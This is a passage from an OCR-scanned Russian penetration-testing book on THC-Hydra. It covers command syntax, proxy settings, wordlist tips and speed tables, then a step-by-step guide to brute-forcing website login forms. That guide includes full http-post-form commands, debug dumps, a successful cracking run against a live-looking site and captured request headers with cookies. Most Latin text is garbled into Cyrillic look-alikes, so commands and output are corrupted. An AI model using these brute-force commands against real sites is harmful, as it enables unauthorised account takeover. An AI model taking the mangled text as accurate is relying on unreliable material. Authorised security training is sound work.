командной строке или в формате сжуба://цель/опция. 

Примеры (они все означают одно и то же): 


1| 

Ііусіга -11е$1 -р ТезТ -ш РІ.АІІЧ 127.0.0.1 ітар 

21 

Ііусіга -11е$1: -р 1е51127.0.0.1 ітар РІ.АІІЧ 

3| 

Ііусіга -1 ТезТ -р Тезе ітар://127.0.0.1/РІ_АІІ\І 


Возобновление прерванной/оборванной сессии 


Когда Ііусіга прерывается командой Сопігоі-С, убивается или вылетает с ошибкой, она 
оставляет файл "Ііусіга.гезіоге" в котором содержится вся необходимая информация 
для восстановления сессии. Этот файл сессии пишется каждые 5 минут. 

Примечание: файл Ііусіга.гезіоге НЕ может быть скопирован между различными 
платформами (например с ІіНІе іпсііап на Ьі§ іпсііап или с зоіагіз на аіх) 

Как сканировать/взлаллывать через прокси 

Переменная среды НѴОКА_РКОХѴ_НТТР определяет веб прокси (это работает только 
для службы ІіМр/ѵѵѵѵѵѵ!) 


Следующий синтаксис является валидными: 


1 


НѴОКА_РКОХѴ_НТТР="Іі1:1:р://123.45. 67.89:8080/" 
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Для всех остальных служб используйте переменную НѴОКА_РКОХѴ для 
сканирования/взлома через дефолтный вызов веб-прокси СОІЧІЧЕСТ. Он использует тот 
же самый синтаксис, например: 


1 


НУОВА_РВОХУ=[Ы:1:р 150ск$41 50ск55]://ргоху_асІсІг:ргоху_роіТ: 


Например: 


1 


НУ0ВА_РРЮХУ=М:1:р://ргоху.апопутІ2ег.сот:8000 


Если на прокси необходима аутентификация, используйте переменную окружения 
НУЭКА РКОХУ АІІТН: 


1 


НѴОВА_РВОХѴ_АІІТН="1:Іте_Іо§іп:1:Іте_ра55\л/огсі" 


Дополнительные подсказки 


• сортируйте ваши файлы с паролями по вероятности и используйте опцию -и для 
нахождения паролей намного быстрее! 


• пропускайте ваши словари через команду ипіц, чтобы они содержали только 
уникальные записи! Это может сэкономить вам уйму времени: 


1 


саТ ѵѵогсізТхі: | зогТ | ипіц > сНсбопагу.ЪЦ 


• если вы знаете, что цель использует политику паролей (позволяя пользователям 
выбирать пароли только с минимальной длинной от б символов, содержащих 
по крайней мере одну букву и одну цифру и т. д., используйте инструмент рѵѵ- 
і пзресТог, который поставляется вместе с пакетом Ьусіга для уменьшения списка 
паролей: 


1 


саТ сЛсбопагу.ЪЦ | рѵѵ-іпзресіог -т 6 -с 2 -п > разБІізТ.ТхТ 


Скорость Нусіга 

Благодаря функции множественных одновременных запросов, этот инструмент взлома 
паролей может быть очень быстрым. Тем не менее, скорость зависит от протокола. 
Самыми быстрыми являются РОРЗ и РТР. 

Экспериментируйте с опцией -I для ускорения! Чем выше — тем быстрее (но слишком 
высокое — и это отключит службу) 


Статистика Иусіга 

Запущенная в отношении 5и5Е Ыпих 7.2 на локалхосте с "-С РНЕ", содержащем 295 
записей (294 невалидных учётных данных, 1 валидный). Каждый тест запускался три 
раза (только для "1 задача" единожды) и были получены следующие средние цифры: 
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1| 

ПАРАЛЛЕЛЬНЫЕ ЗАДАЧИ 

21 

5ЕКѴІСЕ 

1 

4 

8 

16 

32 

50 

64 

100 

128 

3| 




4| 

ТеІпеТ 

23:20 

5:58 

2:58 

1:34 

1:05 

0:33 

0:45* 

0:25* 

0:55* 

51 

Др 

45:54 

11:51 

5:54 

3:06 

1:25 

0:58 

0:46 

0:29 

0:32 

6| 

рорЗ 

92:10 

27:16 

13:56 

6:42 

2:55 

1:57 

1:24 

1:14 

0:50 

71 

ітар 

31:05 

7:41 

3:51 

1:58 

1:01 

0:39 

0:32 

0:25 

0:21 

81 


91 

(*) Обратите внимание на тайминг ТеІ пеТ — он может быть ОЧЕНЬ разным для задач 
от 64 до 128! Например, со 128 задачами, запущенный четыре раза, результаты в 
тайминге между 28 и 97 секундами! 

101 

Причина этого неизвестна... 

111 


121 


13 

Предположений на задачу (округлённо): 

141 


295 

74 

38 

19 

10 

6 

5 

3 

3 

151 


161 

Возможные предположения на соединения (зависит от серверного программного 
обеспечения и конфигурации): 

171 

ТеІпеТ 

4 









181 

Др 

6 









191 

рорЗ 

1 









201 

ітар 

3 










Глава 60. Брутфорсинг веб-сайтов с Нусіга (часть вторая 
инструкции по Нусіга) 

Первая часть здесь: « ТНС-НусІга: очень быстрый взломщик сетевого входа в систему ». 
Рекомендуется начать знакомство именно с неё, т. к. она содержит подробное 
описание синтаксиса и инструкцию по работе с Нусіга. 

В этой части рассмотрены трудные моменты по перебору паролей на веб-сайтах. 
Трудными они являются из-за того, что все веб-сайты разные и содержат разные поля в 
формах. А названия этих полей нужно обязательно указать в Нусіга. Более того, даже 
если указать всё правильно, это не означает, что Нусіга будет работать корректно — в 
Интернете (в том числе англоязычном) очень много вопросов по этому поводу. В этой 
части будут рассмотрены эти проблемы и даны рекомендации как правильно 
настроить Нусіга для перебора паролей на сайтах. 
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Тестирование на проникновение с помощью КаМ Ыпих 2.0 


Помощь по модулям Иир-ро5І-^огт и Нир-ёеМогт 

По умолчанию эти модули сконфигурированы на следование максимум по пяти 
редиректам подряд. Они всегда собирают новые куки для одинаковых ІІКІ. без 
значений. 


Параметр принимает три величины разделённых двоеточием плюс опциональную 
величину. 

(Примечание: если вам нужно двоеточие в строке опции в качестве значения, 
экранируйте его так но не экранируйте "\" на "\\".) 


Синтаксис: 


1 


<игІ>:<параметры формы>:<строки условия>[:<опционально>[:<опционально>] 


Первое — это ІІРЯ страницы на сервере, принимающей СЕТ или Р05Т. 


Второе — это величины Р05Т/0ЕТ (принятые хоть от браузера, прокси и т. д.) имена 
пользователя и пароли будут символизируют заполнители " Л ІІ5ЕВ Л " и " Л РА55 Л " 
(параметры формы). 


Третье — это строка, которая проверяет на *неверный* логин (по умолчанию). 

Строке, соответствующей условию введения неверных учётных данных может 
предшествовать строка "Р=", строке, соответствующей условию введения верных 
учётных данных должна предшествовать "5=". 

Здесь многие ошибаются. Вы должны проверить веб-приложение, на что похожа 
строка, выдаваемая при неверных учётных данных и скопировать её в этот параметр! 

Следующие параметры опциональные: 

• С=/ра§е/игі определяет другую страницу для сбора базовых куки 

• (б | Н)=Му-НсІг\: бзо для отправки заданных пользователем НТТР заголовка при 
каждом запросе 

• Л 1)5ЕВ Л и Л РА55 Л также могут быть внесены в этот заголовок! 

Справка: 'б' добавит заданный пользователем заголовок в конец не обращая 
внимания, был ли он уже отправлен Нусіга или нет. 

'Н' заменит значение существующего заголовка той строкой, которая задана 
пользователем или добавит заголовок в конец 

Обратите внимание, что если вам нужно двоеточие (:) в ваших заголовках, то его нужно 
экранировать обратным слэшем (\). 

Все двоеточия, которые не являются разделителями опций, должны быть 
экранированы (смотрите примеры выше и ниже). 

Вы можете задать заголовок без экранирования двоеточий, но таким образом вы не 
сможете разместить двоеточия в самих значениях заголовка, поскольку они будут 
интерпретироваться в бус!га как разделители. 
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Примеры: 


1| 

"/Іо§іп.рІір:и$ег= Л ІІ5ЕВ Л &ра55= Л РА55 Л :іпсоггес1:" 

21 


3| 

"/Іо§іп.рІтр:и5ег= л ІІ5ЕВ л &ра55= л РА55 л &соІоп=соІоп\:е5саре:5=аи1:Ыо§=.*5иссе55" 

4| 


51 

"/Іо§іп.рІтр:и5ег= л І)5ЕВ л &ра55= л РА55 л &тісІ=123:аи1:Ыоё=.*1 : аіІесІ" 

6| 


71 

и /:и5ег= л и5ЕВ&ра55= л РА55 л :1 : аіІесІ:Н=Аи1:ІіогІ2а1:іоп\: Вазіс сІТІѵѵ: Н=Соокіе\: 
5Ѳ55Ісі=аааа:Іі=Х-ІІ5ег\: Л ІІ5ЕВ Л " 

81 


91 

и /ехсІі\/ѵеЬ/Ьіп/аи1:Іі/о\/ѵааи1:Ь.гіІІ:гіе$бпабоп=Ні:1:р%ЗА%2Р%2Р<1:аг§е1:>%2РехсІіап§е&1 : Іа§ 

5=0&и5егпате=<гіотаіп>%5С л иБЕВ л &ра55ѵѵогё= л РА55 л &5иЬті1:СгесІ5=х&1:ги5І:ес)=0:геа 

50п=:С=/ехсН\л/еЬ" 


Полная команда для брутфорса сайтов с Нусіга выглядит примерно так: 


1 


Иусіга -I. Іодіпз.іхі: -Р раззѵѵогсІБ.ТхІ: Ьир-ро5І-1 : огт://ехатрІе.ог§/ -т 
"/5І§піп.рІір:Іо§іп_и5егпате= Л ІІ5ЕВ Л &Іо§іп_ра55\л/огсІ= Л РА55 Л :РІеа5е Іо§іп" 


Рассмотрим все элементы: 

-I Іо§іпз.Ш -Р ра55ѵѵогсІ5.Ш — это имена пользователей и пароли, как их можно задать 
рассказывается в первой части — если вы не понимаете этот фрагмент, то начните 
чтение с первой части. 

Иир-ро5І-^огт — это протокол, точнее говоря, это указание на то, что брутфорсится 
форма ввода (Іюгт) сайта (ННр), которая отправляет параметры методом Р05Т (роз*). 

Вместо ІіІТр-розМогт может быть указан И«р-§еІ-^огт — в случае, если форма 
отправляет параметры методом СЕТ. 

ехатрІе.ог§- адрес сайта для подбора паролей 

-т — ключ, который говорит о том, что сейчас будет передана специальная опция для 
модуля (в данном случае для модуля НМр-розМогт) 

Ѵ5І§піп.рНр:Іо§іп_и$егпате= Л ІІ5ЕК Л &Іо§іп_ра$$ѵѵогс1= Л РА55 Л :РІеа5е Іо§іп" — эта и есть 
передаваемая опция, уберём кавычки и разделим её на три части, разделителем 
служит двоеточие 

/§і§піп.рНр — адрес страницы, куда передаются данные формы, должен 
начинаться со слеша 

Іо§іп_и5егпате= Л ІІ5ЕК Л &Іо§іп_ра5$\л/огс1= Л РА55 Л — это строка, которая 
передаётся форме. О ней подробнее рассказывалось чуть выше. Л ІІ5ЕК Л — это 
заполнитель, который будет заменяться на имя пользователя. Л РА55 Л — это 
заполнитель для пароля. 

Слова Іо§іп_и$егпате и Іо§іп_ра55\люгс1 — это названия полей формы, они у 
каждой формы свои, их нужно задавать самому. 
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РІеа$е Іо§іп — это строка, которую Нусіга будет искать в присланном от сайта 
ответе после введения учётных данных. Если эта строка присутствует, значит 
попытка аутентификация провалилась, учётные данные неверны и нужно 
пробовать следующие логины и пароли. Если эта строка отсутствует, значит 
произошёл вход. Эта строка индивидуальна для каждого сайта и вам 
самостоятельно нужно её выявлять и задавать. 

Как видно, достаточно запутанно, плюс к этому, есть ещё и подводные камни. Давайте 
будем разбираться на конкретных примерах. 

Как ввести данные в Нусіга для перебора пароля на сайте 

Рассмотрим на примере конкретного сайта. Форму можно исследовать двумя 
способами — статическим и динамическим. Давайте рассмотрим оба способа 
последовательно. 


Дан сайт с адресом Н11р://ехатр1е.ог§/. На этом сайте есть форма для ввода пароля: 


1| 

сіюгт те1:Носі="ро5І:" епс1уре=''аррІісаНоп/х-ѵѵ\/ѵ\/ѵ-1югт-игІепсосІесГ ас1:іоп="?5І§піп" 

БТу Іе="таг§і п: 10рх;"> 

21 

<1аЫе> 

3| 

<Тг> 

4| 

<1сІ><ІаЬеІ>Имя</ІаЬеІ></і:сі> 

51 

<1сі><іпри1: 1уре="1:ех1:" з1:уІе="Топ1:-5іге: 11рх" пате="Іо§іп_и5етате" 5І2е="10" 
ѵаІие="Имя" опіюсиз-'іі' (бгіз.ѵаіие == 'Имя') іНіз.ѵаІие = /></1х1> 

6| 

<Дг> 

71 


81 

<1:г> 

91 

<1сі><ІаЬеІ>Пароль</ІаЬеІ></і:сІ> 

10| 

<1сІ><іпри1: 1уре="ра55ѵѵогсІ" 5ТуІе="Топ1:-5І2е: 11рх" пате="Іо§іп_ра55\л/огсІ" 5І2е="10" 
/><АсІ> 

111 

<Дг> 

121 


131 

<Тг> 

141 

<ТсІ><ІаЬеІ><іпри1:1уре="сІіескЬох" пате="соокіеи5ег" ѵаІие="1" сІгескесІ="сІтескес)" 
/>Запомнить?</ІаЬеІх/і:сі> 

151 

<1сі><іпри1: 1уре="5иЬті1:" ѵаІие="Вход" бИе="Введите Ваше имя пользователя и 
пароль, чтобы войти, или нажмите кнопку 'Регистрация', чтобы зарегистрироваться." 
/><ДсІ> 

16 

<Дг> 

171 

<ДаЫе> 

181 

<Допп> 


Задача — составить команду для Нусіга под эту форму. 
В форме видим строку 

теіНосі="ро5І:" 
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Тестирование на проникновение с помощью КаМ Ыпих 2.0 


Значит будем использовать метод ГіНр-розМогт, итак, начнёт писать нашу команду: 


1 


Иусіга -I 111111 -р 222222 Н11р-ро5Могт://ехатр1е.ог§ 


111111 и 222222 - это предполагаемое имя и пароль пользователя (можно указать 
файлы для перебора) 

Нир-ро5І-^огт — это указание на используемый модуль (на используемый протокол) 
ехатрІе.ог§ — это адрес сайта (обязательно без конечного слэша). 


Теперь нам нужно составить строку, состоящую из трёх величин, разделённых 
двоеточием 


"адрес_страницы_куда_отправляются_данные_из_формы:передаваемая_в_форму_стр 

ока:строка_которую_ищем_в_ответе" 


Глядя на форму мы видим, что она свои данные передаёт на страницу ?5І§піп — 
поставим перед ним слеш и первый элемент строки готов: 


1 


/?5І§ПІП 


Форма содержит следующие поля: Іо§іп_и$егпате, Іо§іп_ра$$\л/огсІ, соокіеизег 


Іо§іп_и5егпате передаёт имя пользователя, т. е. Л 1)5ЕК Л , поэтому 
Іо§іп_и5егпате= л ІІ5ЕК л , Іо§іп_ра55\л/огсІ передаёт пароль пользователя, т. е. 
поэтому Л РА55 Л Іо§іп_ра$5\л/огсІ= л РА55 л , есть есть соокіеизег, присвоем ей статичную 
величину соокіеи$ег=1, теперь полученные отрезки объединяем символом &: 


1 


Іо§іп_и5егпате= Л ІІ5ЕВ Л &Іо§іп_ра55ѵѵогсі= Л РА55 Л &соокіеи5ег=1 


Теперь третий элемент — то, что мы будем искать в ответе. Например, в форме есть 
строка «Введите Ваше имя пользователя и пароль». Практически наверняка после 
входа на сайт эта строка не отображается — поскольку она больше не нужна. Поэтому 
мы выбираем её для поиска: если она найдена, перебор будет продолжаться, если в 
ответе нет этой строки, значит мы успешно вошли, т. е. угадали логин и пароль. 

Ещё можно попробовать ввести любые учётные и посмотреть на ошибку, которую 
выдаёт веб-сайт. Эту ошибку (часть этой строки) и нужно использовать. 


Т.е. мы составили три подстроки, исходя из анализа формы: 


1| 

/?5І§ПІП 

21 

Іо§іп_и5егпате= Л ІІ5ЕК Л &Іо§іп_ра55\л/огсІ= Л РА55 Л &соокіеи5ег=1 

3| 

Введите Ваше имя пользователя и пароль 

Объединим эти строки, разделив их двоеточием: 

1| 

/?5І§піп:Іо§іп_и5егпате= Л 1)5ЕВ Л &Іо§іп_ра55\л/огсі= Л РА55 Л &соокіеи5ег=1: Введите Ваше 
имя пользователя и пароль 
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Тестирование на проникновение с помощью КаМ Ыпих 2.0 


Эту строку нужно взять в двойные кавычки и перед ней поставить ключ -т. Т.е. наша 
строка для брутфорса теперь выглядит так: 


1 


Иусіга -I 111111 -р 222222 Иир-ро$1-(огт://ехатрІе.ог§ -т 

"/?5І§піп:Іо§іп_и5егпате= Л ІІБЕВ Л &Іо§іп_ра55ѵѵогсІ= Л РА55 Л &соокіеи5ег=1: Введите Ваше 
имя пользователя и пароль" 


Для большинства сайтов этот алгоритм будет работать. 


Но для конкретного этого сайта, даже при подстановке верных учётных данных Нубга 
не может распознать, что пароль подобран. Это первый подводный камень: 


Нусіга и проблема для сайтов с редиректом 


Для анализа проблемы я буду использовать ключ -6 


1 


Ііусіга -I 111111 -р 222222 Шр-ро5Могт://ехатрІе.ог§ -т 

"/?5І§піп:Іо§іп_и5етате= Л ІІ5ЕВ Л &Іо§іп_ра55ѵѵогс)= Л РА55 Л &соокіеи5ег=1: Введите Ваше 
имя пользователя и пароль" -сі 


Вот кусочек из сообщения отладки: 


1 

[0ЕВ6С] 

Ьѳаб по[0] То 

сл і ус с і і 

ТагдеТ по 

^7-СГСТХТГС X 

0 асТіѵе 1 



[ЭЕВІІС] 

ВЕСѴ [ріб:1809] (219 ЬуТез) : 





ш 


4854 

5450 

2Т31 

2е31 

2033 

3032 

2046 

6Т76 

[ НТТР/1.1 302 Моѵ 

] 

0010 


6564 

2054 

6566 

706Т 

7261 

7269 

6с79 

060а 

[ еб ТетрогагИу .. 

] 

0020 


5365 

7276 

6572 

За20 

6ѳ67 

696ѳ 

782Т 

312ѳ 

[ Зегѵѳг: пдіпх/1. 

] 

0030 


362е 

3306 

Ѳа44 

6174 

653а 

2046 

6Т6е 

2с20 

[ 6.3..ОаТе: Моп, 

] 

0040 


3137 

2041 

7567 

2032 

3031 

3520 

3031 

3а35 

[ 17 Аид 2015 01:5 

] 

0050 


353а 

3430 

2047 

4654 

060а 

436Т 

6ѳ74 

656е 

[ 5:40 СМТ. .СопТеп 

] 

0060 


7426 

5479 

7065 

За20 

7465 

7874 

2Т68 

7466 

[ Т-Туре: ТѳхТ/ЬТт 

] 

0070 


6сЗЬ 

2063 

6861 

7273 

6574 

3655 

5446 

2638 

[ 1; сТіагзѳТ=ІІТР-8 

] 

0080 


060а 

436Т 

6е74 

656ѳ 

7426 

4с65 

6е67 

7468 

[ . .СопТепТ -І_епдТЬ 

] 

0090 


За20 

3006 

Ѳа43 

6Т6ѳ 

6е65 

6374 

696Т 

6еЗа 

[ : 0..СоппесТіоп: 

] 

00а0 


2063 

6с6Т 

7365 

060а 

5826 

506Т 

7765 

7265 

[ сіозе. .Х-Ромеге 

] 

ѳѳьѳ 


6426 

4279 

За20 

5048 

502Т 

352е 

362е 

3406 

[ 6-Ву: РНР/5.6.4. 

] 

00с 0 


Ѳа4с 

6Т63 

6174 

696Т 

6еЗа 

202е 

2ТЗТ 

6176 

[ .ЬосаТіоп: ./?аѵ 

] 

0060 


6Т69 

6473 

7461 

7406 

0а06 

0а 



[ оібзТаТ.... 

] 

[бЕвис] 

Ьубга гесеіѵе 

Ііпе 

маіТТіте 

32, 

сопмаіТ 

: 0, зоскеТ : 6, ріб 

1809 

[йЕвис] 

ВЕСѴ [ріб:1809] (0 ЬуТез): 





[ЭЕвис] 

г •— ■ ■ +* ч 

аТТешрТ 

_1_1_І_Э_ 

гезиІТ: Тоипб 0 

гебігесТ 

1, ІосаТіоп: ./ЗаѵоібзТаТ 

_і і і і_і і_' « ■_■ 



Это то, что отправляет сервер в ответ на попытку авторизации. Оказывается, никакие 
сообщения об ошибке не показываются, вообще ничего не показывается — происходит 
только редирект... 

Повторюсь, такие ситуации не часты — скорее, это исключения. «Нормальные» сайты 
показывают нам нормальные сообщения об ошибках. В крайнем случае, даже при 
редиректе можно попытаться найти какое-то отличие в ответах для заголовков при 
верной и при ошибочной авторизации. 

Например, т. к. для рассматриваемого сайта я знаю верные учётные данные, то я могу 
ввести их и, оставаясь в режиме отладки, посмотреть на разницу вывода: 
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Тестирование на проникновение с помощью КаМ Ыпих 2.0 



Ну можно кричать «Эврика!», ведь заголовок ответа другой, а именно — при вводе 
верных учётных данных устанавливается куки, т. е. нам нужно искать строку 5еІ-Соокіе. 
Причём, если эта строка есть — значит всё прошло успешно. Перед этой строкой мы 
поставим 5=, это даст указание НуРга, что если строка найдена, то это успех, а не 
провал: 


1 


Нусіга -I 111111 -р 222222 НИр-ро$Ы : огт://ехатрІе.ог§ -т 

"/?5І§піп:Іо§іп_и5етате= Л ІІ5ЕВ Л &Іо§т_ра55\л/огсІ= Л РА55 Л &соокіеи5ег=1:5=5е1:-Соокіе" 


гооІ@ѴѴеЬѴѴаге: ~ 

Файл Правка Вид Поиск Терминал Справка 


НуРга -1 111111 -р 222222 Ніір-розі -■Рогт://|^^^^^*.огд -т "/?5ідпіп:1одіп_изѳгпате= Л ІІ5ЕР Л &1одіп_ра55*гогР=''РА55''&соокіѳи5ѳг=1:5=5ѳі-Соокіѳ" 
НуРга ѵ8.1 (с) 2014 Ьу ѵап Наизег/ТНС - Ріеазѳ Ро поі изе іп тііііагу ог зесгеі зегѵісе огдапігаііопз, ог Тог іііедаі ригрозез. 

НуРга (Ніір://ѵлл*.іНс.огд/іНс-НуРга) зіагііпд аі 2Ѳ15-08-17 05:11:19 

[РАТА] тах 1 Тазк рег 1 зегѵег, оѵегаіі 64 Тазкз, 1 Іодіп Тгу (1:1/р:1), ~Ѳ Тгіез рег Тазк 
[ОАТА] аТТаскіпд зѳгѵісѳ Ніір-розі-Топп оп рогі 80 
1 оТ 1 Тагдеі сотріеіер, 0 ѵаіір раззѵѵогРз ТоипР 
НуРга (НТТр://ѵлл*.1:Нс .огд/ТНс-НуРга) ТіпізНеР аі 2015-08-17 05:11:36 

НуРга -1 -р НПр-розі -Тогт:// .огд -т , 7?зідпіп:1одіп_изѳгпатв='‘ІІ5ЕР л &1одіп_ра5зѵл5гР= л РА55 л &соокіѳи5ѳг=1:5=5ѳі-Соокіѳ" 

НуРга ѵ8.1 (с) 2014 Ьу ѵап Наизег/ТНС - РТѳазе Ро поТ изе іп тііііагу ог зесгеі эегѵісе огдапігаііопз, о г Тог іііедаі ригрозез. 

НуРга (Н1Тр://ѵляѵ.1:Нс .огд/іНс-НуРга) зіагііпд аі 2015-08-17 05:12:02 

[ЭАТА] шах 1 Тазк рег 1 зегѵег, оѵегаіі 64 Тазкз, 1 Іодіп Тгу (1:1/р:1), -0 Тгіез рег Тазк 
[ОАТА] аііаскіпд зегѵісе Ніір-розТ-Тогш оп рогі 80 
[ )] [ г т] Нозі: Іодіп: раззмогР: 

1 оТ 1 Та где! зиссеззТиІІу сотрІеТеР, 1 ѵаіір раззѵѵогР ТоипР 
НуРга (ПС1р://ммм.ТНс .огд/ТНс-НуРга) ТіпізНеР аТ 2015-08-17 05:12:04 
: | 


Т.е. теперь всё работает, при вводе ложных данных, НуРга понимает, что данные 
ложные. А при вводе верных данных — понимает, что имя и пароль угаданы. 

Все сайты разные, и для каждого движка нужно тестировать, прежде чем начинать 
атаку. 
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Тестирование на проникновение с помощью КаМ Ыпих 2.0 


Взлом пароля для \Л/оге)Рге$5 с Нусіга 
Динамический анализ форм 

Давайте теперь проведём динамический анализ формы. Я буду делать браузере 
СЬготе (в Рі ге^ох также есть функционал для веб-разработчиков). 

Переходим на сайт, который мы будем брутфорсить. Находим страницу авторизации 
Ні; 1 ;р://по 1 ;\л/еЬ\л/аге.ЬІ 2 /\л/р-Іо§іп.рЬр. Теперь открываем в браузере Настройки и 
управление Соо§1е СНготе -> Дополнительные инструменты -> Инструменты 
разработчика 

В них находим вкладку №іѵѵогк. 

Вводим в форму любые учётные данные и нажимаем Войти. 

Смотрим на нашу панель разработчика: 


О, 0 ЕІетепІ* 1 Ыеіѵѵогк і Ьоигсе* Тітеііпе РгоТіІеа Ке$оигсе5 АиЗіі* Сопзоіе 


• ® V Ѵіеѵк 


| ЯНег 


і -4 


ОрЬоп5: О Рге*егѵе Іод О Рі*аЫе сасЬе 

..—._І О ХНР 5сгірІ 5іуІе Ітаде* Месііа Ропі* Роситепи \Л/еЬ5оске4* ОТЬег □ Нісіе сіаЬа ЦКЬз 

4 00 5 6 00 ' 8.005 10005 12.005 14.005 16.005 18.005 


^ ѵѵр-іодіп.ріір 


У ЬиЙоп*.тіп.с*5?ѵег=4.2.4 СЕТ 
У с**ГГаті:у=Ореп+$ап*%ЗА300*аііе%2С400іІаііс%2С600іІаііс%2С300... СЕТ 
У йа$Лісопітіп.с55?ѵег=4.24 СЕТ 

У Іодіп.тіп.С55?ѵег=4.2.4 СЕТ 

У Оаіаярріісаііоп/х-... СЕТ 

Щ жог0рге*5-іодо.5ѵд?ѵег=20131107 СЕТ 


Туре 

йоситепі 

зіуіезлееі 

* 1 уіе*йееі 

5Іуіе5ЛееТ 

*1уіе5*іееі 

(опі 


Ігіііаіог 

Ойіег 

ѵ/р-І0д.г.рЛр:П 

>ур-!оо.п.оЬо:12 

\ѵр-ЮОІР.рЬр:13 

ѵѵр-іООТ.рЬр:14 

ѵ/р-іоат.оЛо:51 

ѵ/р-одл.рНр:?! 


4.2 КВ 

(йот саеЬе) 
(йотсасйе) 
(Йот сасЬе) 
(йотсасйе) 
(йот сасйе} 
(Йот саспе) 


0«Г>5 
0 ГП5 

От* 

От* 

От* 

От* 


Нас интересует строка, которая содержит адрес страницы ѵѵр-Іо§іп.рИр и метод 
отправки Р05Т. Кликаем на неё. Там где Рогт Оаіа выбираем ѵіеѵѵ зоигсе: 


№те 

У) ѵѵр-іодіп.рЬр 
[У Ьи«оп 5 .тіп.с$ 5 ?ѵег= 4 . 2.4 
У) с* 5 ?Раптіу=Ореп+ 5 ал*%ЗАЗО... 
У 0 а 5 йісоп 5 .тіп.с 55 Тѵег= 4 . 2.4 
У Іодіп.тіп.с**?ѵег= 4 . 2.4 
У Оаіазрріісаііоп/х-... 

[ф] \ѵогс!рге 55 -:одо. 5 ѵдТѵег= 2013 ... 


I Неасіег* | Ргеѵіеѵѵ Ке*роп*е Соокіе5 Тітіпд 


7/8 гедие*І5 і 4.2 КВ / 4,2 КВ (га... 


| Соп*оІе | ВеагсЬ ЕтиІаТіоп Кепсіегіпд 


Тгап5рег-Епсо<ііпд: сйипкеО 
Х-Ргаше-Ор(іоп5: БАМЕОИбІИ 
Х-Роѵѵегесі-Ву: РНР/5.6.4 
т Кедие*! Неавег* ѵіеѵѵ 5оигсе 

АссерЪ ТехТ/ІтйпІ, арр1ісаТіоп/хйТт1+хт1,аррІісаТіоп/хяіІ;д=0.9,ітаее/ѵѵеЬр, V”;4=0.8 
АссерТ-Епсоскпд: ехір, ОеТІаТе 

Ассері- Ьапдиаде: ги- ВЦ, ги; ч=0. 8, еп -1)5; д=0.6, еп; д=0. 4,ТЬ; д=0.2 
СасЬе-СопТгоІ: тах-аее=0 
СоппесТіоп: кеер-аііѵе 
СопІепТ-І.епдіЬ: 145 

СопТепІ-Туре: аррІісаТіоп/х-ммм-Тогт-игІепсоОеО 

Соокіе: _еа=бА1 .2.1887348117.1414600070; мр-5еТТіпе5-1=еОіТог*ЗРТіпутсе*2беО_5І2е?іЗО210%261іЬгагуСопТепТ*ЗОЬгом5еХ2біті5І2е%ЗОТи11*26(ііаеТЬ*ЗО1Х2бро' 
1=*78*22гіІ5ТіпсЬ_і‘1*22*ЗА*20*2249399*22*2С*22*24іліТіа1_геТеггег*22*ЗА*20*22(іТТр*ЗА»2Р*2РиеЬмаге.Ьігів2Рмр-агітіп*2Рр1ибіп5.рЬр*ЗРр1иеіп_5ТаТи5*ЗОа11*2€ 
і1типсИ_5есоп<1_рабеѵіеіѵ=1:гие; ма5*ир_5сгееп_ге5=1920%20х*>201080; мІ5ІО=с0Ь4аЬаа1сбе5374сІ122О83с150е9е19б; ѵф-5еТТіпе$-б=е<1іТог%ЗІ)Тіпупісе*2б1іЬгагуСоп1е 
МдО4ГЮА52зВд2ОІ1МТйд2(пѴдОМЗі2ТЕ6ОдЕ0И2кЗООА4М2ббОзЕ5МдАбеСАхМОіѵѵОзохМТкиЦ2ѴиН2АиНТА1ОдохМТкиМ2ѴиМ2АиМТА1ОдрХ2иЗХѴХПІРй1ѴМ0*253О; _ут_ѵі*огс_25917б5Ѳ= 
Но*1: меЬмаге.Ріі 
Огідіп: ІіТТр: / /меЬмаге. ЬІ 2 
КеТегеп (тМр: //меЬмаге. Ьіг/ир-Іоеіп. р(ір 
ІІрдгасіе-Іпіесиге-КедиевІ*: 1 

ІІ*ег-АдепТ: МогШа/5.0 (Ыіпсіом* МТ 10.0; М0М64) АррІеИеЬКіТ/537.36 (КНТМІ, Ііке беско) Оіготе/44.0.2403.155 5аТагі/537.3б 


Интересующая нас строка: 


1 


Іо§=111111&р\л/сІ=222222&гететЬегте=1 : огеѵег&\л/р- 

5иЬті(:=%00%92%00%ВЕ%00%В9%01%82%00%В8&гесіігес1:_1:о=Ы:1:р%ЗА%2Р%2Р\л/еЬѵѵа 

ге.ЬІ2%2Рѵѵр-аётт%2Р&1:е$1:соокіе=1 


Я в качестве имени пользователя и пароля вводил 111111 и 222222, именно их мы и 
заменяем на Л 1)5ЕК Л и Л РА55 Л : 
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Так, передаваемая из формы строка готова: 


1 


Іо§= л І)5ЕВ л &р\л/сІ= л РА55 л &гететЬегте=1 : огеѵег&ѵѵр- 

$иЬтіГ=%00%92%00%ВЕ%00%В9%01%82%00%В8&гегіігесГ_Го=Ні:1:р%ЗА%2Р%2Р\л/еЬ\л/аг 

е.Ьіі%2Рѵѵр-асітіп%2Р&1:е5І:соокіе=1 


Тем где бепегаі, найдите строку с (^ие$1 ІІКІ.: 


О, Ц Еіетепіз I ІМеІѵ/огк I Боигсез Тітеііпе РгоРіІез Кезоигсез АиРіГз Сопзоіе 


0 'й’ Ѵіеѵѵ: != 


2 . 0 ( 1 ; 


ОрГіопз: У Ргезегѵе Іод О РізаЫе сасЬе 

ХНК Бсгірі 5ТуІе Ітадез Месііа I 
4.00 5 6-00 5 8.005 10.005 


Мате 

* Неасіег5 Ргеѵіеѵѵ Кезропзе Соокіе5 Тітіпд 

0 ѵ/р- одіп.ррір 
_| Ьи«оп5.тіг\с55?ѵег=4.2.4 
_] с55??атііу=Ореп+$агз%ЗАЗО... 

^ 0азІіісопз.тіп.сззТѵег=4.2.4 

Т бепегаі 

Кетоіе Асігігезз: 185.26.122.50:80 

Кедиезі ІІКІ: ИТТр://ѵмеЬѵ:аге.ЬІ2/мр-1оеіп.рЬр 

Кециезі МеДіосІ: Р05Т 

ЬШиз Сосіе: 

Іод і п.т і г .С35 ? ѵег=4.2.4 

0 0аГа:аррІісаГіоп/х-... 

Щ ѵѵогсіргезз- одо.зѵд?ѵег=2013... 

Т Кезропзе Неасіегз ѵіеѵѵ зоигсе 

СасЬе-СопІгоІ: по-сасНе, тизТ-геѵаІісіаТе, тах-а§е=0 
Соппесііоп: кеер-аііѵе 

Сопіепі-Туре: ТехТ/ИТшІ; с(іагзеТ=ІІТР-8 

П.д.. II.. л ~і а.... ілі г лт . іл. іл гит 


В моём случае это: 


1 


Кециезі: 1)ВЕ:Іі1:1:р://ѵѵеЬѵѵаге.ЬІ2/ѵѵр-Іо§іп.рНр 


